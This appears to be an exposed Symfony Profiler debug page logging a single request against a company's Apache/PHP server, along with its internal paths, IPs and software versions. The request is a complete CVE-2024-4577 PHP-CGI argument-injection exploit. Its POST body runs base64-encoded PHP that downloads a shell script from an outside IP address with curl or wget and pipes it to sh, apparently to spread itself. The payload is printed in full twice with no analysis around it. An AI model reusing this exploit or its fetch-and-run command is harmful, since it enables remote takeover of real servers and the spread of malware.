Symfony Profiler

Request

GET Parameters

Key	Value
�d_allow_url_include=1_�d_auto_prepend_file=php://input

POST Parameters

Key	Value
<?php_shell_exec(base64_decode("WD0kKGN1cmwgaHR0cDovLzY2LjYzLjE4Ny4xOTMvc2ggfHwgd2dldCBodHRwOi8vNjYuNjMuMTg3LjE5My9zaCAtTy0pOyBlY2hvICIkWCIgfCBzaCAtcyBjdmVfMjAyNF80NTc3LnNlbGZyZXA	")); echo(md5("Hello CVE-2024-4577")); ?>

Request Attributes

Key	Value
_controller	twig.controller.exception:showAction
exception	Object(Symfony\Component\Debug\Exception\FlattenException)
format	html
logger	Object(Symfony\Bridge\Monolog\Logger)

Cookies

No cookies

Request Headers

Header	Value
accept	/
connection	Keep-Alive
content-length	221
content-type	application/x-www-form-urlencoded
host	192.168.7.15:8091
upgrade-insecure-requests	1
user-agent	Custom-AsyncHttpClient
x-forwarded-for	111.249.69.22
x-forwarded-host	www.grupomaenar.com:443
x-forwarded-server	www.grupomaenar.com
x-php-ob-level	0

Request Content

<?php shell_exec(base64_decode("WD0kKGN1cmwgaHR0cDovLzY2LjYzLjE4Ny4xOTMvc2ggfHwgd2dldCBodHRwOi8vNjYuNjMuMTg3LjE5My9zaCAtTy0pOyBlY2hvICIkWCIgfCBzaCAtcyBjdmVfMjAyNF80NTc3LnNlbGZyZXA=")); echo(md5("Hello CVE-2024-4577")); ?>

Server Parameters

Key	Value
CONTENT_LENGTH	221
CONTENT_TYPE	application/x-www-form-urlencoded
CONTEXT_DOCUMENT_ROOT	/var/www/html/maenar/web
CONTEXT_PREFIX
DOCUMENT_ROOT	/var/www/html/maenar/web
GATEWAY_INTERFACE	CGI/1.1
HTTPS	on
HTTP_ACCEPT	/
HTTP_CONNECTION	Keep-Alive
HTTP_HOST	192.168.7.15:8091
HTTP_UPGRADE_INSECURE_REQUESTS	1
HTTP_USER_AGENT	Custom-AsyncHttpClient
HTTP_X_FORWARDED_FOR	111.249.69.22
HTTP_X_FORWARDED_HOST	www.grupomaenar.com:443
HTTP_X_FORWARDED_SERVER	www.grupomaenar.com
PATH	/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
PHP_SELF	/app.php
QUERY_STRING	%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input
REMOTE_ADDR	192.168.7.18
REMOTE_PORT	35894
REQUEST_METHOD	GET
REQUEST_SCHEME	https
REQUEST_TIME	1754252397
REQUEST_TIME_FLOAT	1754252397.772
REQUEST_URI	/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input
SCRIPT_FILENAME	/var/www/html/maenar/web/app.php
SCRIPT_NAME	/app.php
SERVER_ADDR	172.31.0.2
SERVER_ADMIN	admin@example.com
SERVER_NAME	192.168.7.15
SERVER_PORT	8091
SERVER_PROTOCOL	HTTP/1.1
SERVER_SIGNATURE	<address>Apache/2.4.38 (Debian) Server at 192.168.7.15 Port 8091</address>
SERVER_SOFTWARE	Apache/2.4.38 (Debian)
argc	4
argv	[0 => %ADd, 1 => allow_url_include%3d1, 2 => %ADd, 3 => auto_prepend_file%3dphp://input]

Response

Response Headers

Header	Value
cache-control	no-cache
content-type	text/html
date	Sun, 03 Aug 2025 20:19:57 GMT
x-debug-token	149fa7

Session

Session Metadata

No session metadata

Session Attributes

No session attributes

Flashes

No flash messages were created.

Parent Request

Return to parent request (token = cbd4c7)

Key	Value
(no data)

Symfony Profiler

https://192.168.7.15:8091/hello.world?%ADd%20allow_url_include%3D1%20%ADd%20auto_prepend_file%3Dphp%3A%2F%2Finput

Request

GET Parameters

POST Parameters

Request Attributes

Cookies

Request Headers

Request Content

Server Parameters

Response

Response Headers

Session

Session Metadata

Session Attributes

Flashes

Flashes

Parent Request

Return to parent request (token = cbd4c7)